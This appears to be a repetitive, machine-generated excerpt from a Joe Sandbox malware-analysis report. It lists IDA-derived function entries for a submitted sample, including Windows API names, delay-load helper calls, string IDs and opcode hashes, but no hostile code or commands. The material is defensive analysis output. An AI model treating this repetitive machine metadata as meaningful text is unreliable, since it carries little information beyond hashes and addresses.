                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: LCMapStringEx
                                                                                    • API String ID: 2568140703-3893581201
                                                                                    • Opcode ID: 09417285b0b741213c895c428b368a16898a2cfc2847a0a6dc98a353a8ee612c
                                                                                    • Instruction ID: bb8831003323c6f2049a844128d3f3e30ee49e0ec248d146d55ca200afe2e3a7
                                                                                    • Opcode Fuzzy Hash: 09417285b0b741213c895c428b368a16898a2cfc2847a0a6dc98a353a8ee612c
                                                                                    • Instruction Fuzzy Hash: 8B011372544209BBCF069F90EC06DEE7F66EB08751F018154FE1826160CB7A9A31EB95
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0074A56F), ref: 0074AF55
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                    • API String ID: 2593887523-3084827643
                                                                                    • Opcode ID: 1e28edfeee873940bb71a00b3cf974a758802b1006370424ade05f511de9a33e
                                                                                    • Instruction ID: a50748f29676eec84dbd411a1d9afcea7893668f506824c6fec97f595b5aaa3c
                                                                                    • Opcode Fuzzy Hash: 1e28edfeee873940bb71a00b3cf974a758802b1006370424ade05f511de9a33e
                                                                                    • Instruction Fuzzy Hash: 3AF0B471685208FBCF065F60DC06CDDBF61EF04752B008054FD0856260DFB9AE14DBA9
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc
                                                                                    • API String ID: 2773662609-671089009
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073EAF9
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: 3Ro
                                                                                    • API String ID: 1269201914-1492261280
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 74b954b9480d32e3ae32a4e2d314c9bd3eda1f446e26fb1481bd484e3eed68ee
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: d19974a8d1c359e1f2802d20bc8e5baf3e0ff41f7fd802058d9d3d56d2d47437
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 6aec787217c4f83b00eb7bfdbaa2949db78949ed0002d2ed827cdcb807fa2733
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 87ad042eed76bff47b91e26ea67042eb76ee97f9f97e69d0b78882ded0b6f561
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: d9b9dd08ba32aaa1bac5e9338c75c6d9c837649bbd80bca1997a38cf13d47b99
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                    • Instruction ID: 673788784031477a865c1c81b17a015ff38145b412ed599fbaac47098e89f92b
                                                                                    • Opcode Fuzzy Hash: 407d5b45297d13a4bf8f2a2e0f3a808fd3960a1622d17995a2ed722ae911ce95
                                                                                    • Instruction Fuzzy Hash: B4A011C2AA8200FC300822A02E0ACBB020CC0C0B2AB30A22EF800800C2A8880A280830
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: abf3e51ddf96b9058c26c948dca5341cb1e12e0ed33523a902393f42e4635c21
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                    • Instruction ID: 8f506af1175b28fa4ed91bfe18a6689fb51eb566e601213f30993e73da77fe70
                                                                                    • Opcode Fuzzy Hash: 308c43f38c0d4f1e5253cae27ca6764f377ae88c979edcf59885b1af5e75735f
                                                                                    • Instruction Fuzzy Hash: D7A022C2AAC282FC300822002C0BCBF022CC0C2F2AB30A82EFC02C00C3BCCC0C880830
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
